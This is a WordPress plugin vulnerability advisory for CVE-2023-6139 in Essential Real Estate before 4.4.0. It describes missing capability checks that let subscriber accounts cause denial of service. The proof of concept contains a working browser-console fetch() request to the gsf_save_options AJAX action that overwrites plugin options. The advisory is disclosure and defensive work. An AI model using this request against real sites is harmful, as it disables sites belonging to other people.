Essential Real Estate < 4.4.0 – Subscriber+ Denial of Service via Arbitrary Option Update | CVE 2023-6139 | Plugin Vulnerabilities

Description

The plugin does not apply proper capability checks on its AJAX actions, which among other things, allow attackers with a subscriber account to conduct Denial of Service attacks.

Proof of Concept

1. login, and visit https://vulnerable-site.tld/wp-admin/profile.php?action=delete
2. run the following in your browser console: 

fetch("/wp-admin/admin-ajax.php?action=gsf_save_options", {"headers": {"content-type": "application/x-www-form-urlencoded",},"body": `_wpnonce=${GSF_META_DATA['nonce']}&_current_preset=template`,"method": "POST",}).then((response) => {return response.text();    }).then((data) => {console.log(data);})

The same can be achieved via other AJAX actions in the plugin, like "gsf_import_theme_options".

Affects Plugins

essential-real-estate

Fixed in 4.4.0

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

Miscellaneous

Original Researcher

Krzysztof Zając (CERT PL)

Submitter

Krzysztof Zając (CERT PL)

Submitter website

https://cert.pl

Submitter twitter

Verified

Yes

WPVDB ID

96396a22-f523-4c51-8b72-52be266988aa

Timeline

Publicly Published

2023-12-18 (about 4 months ago)

Added

2023-12-18 (about 4 months ago)

Last Updated

2023-12-18 (about 4 months ago)

Other

Published

Title

Published

2024-03-07

Title

affiliate-toolkit – WordPress Affiliate Plugin < 3.5.5 - Missing Authorization via atkp_create_list

Published

2023-12-27

Title

FunnelKit Checkout < 3.11.0 - Unauthenticated Arbitrary Content Deletion

Published

2023-09-05

Title

Slider Pro < 4.8.7 - Missing Authorization via AJAX actions

Published

2023-12-27

Title

WooCommerce Canada Post Shipping < 2.8.4 - Unauthenticated Unauthorised Action

Published

2024-04-29

Title

Progressive WordPress (PWA) <= 2.1.13 - Missing Authorization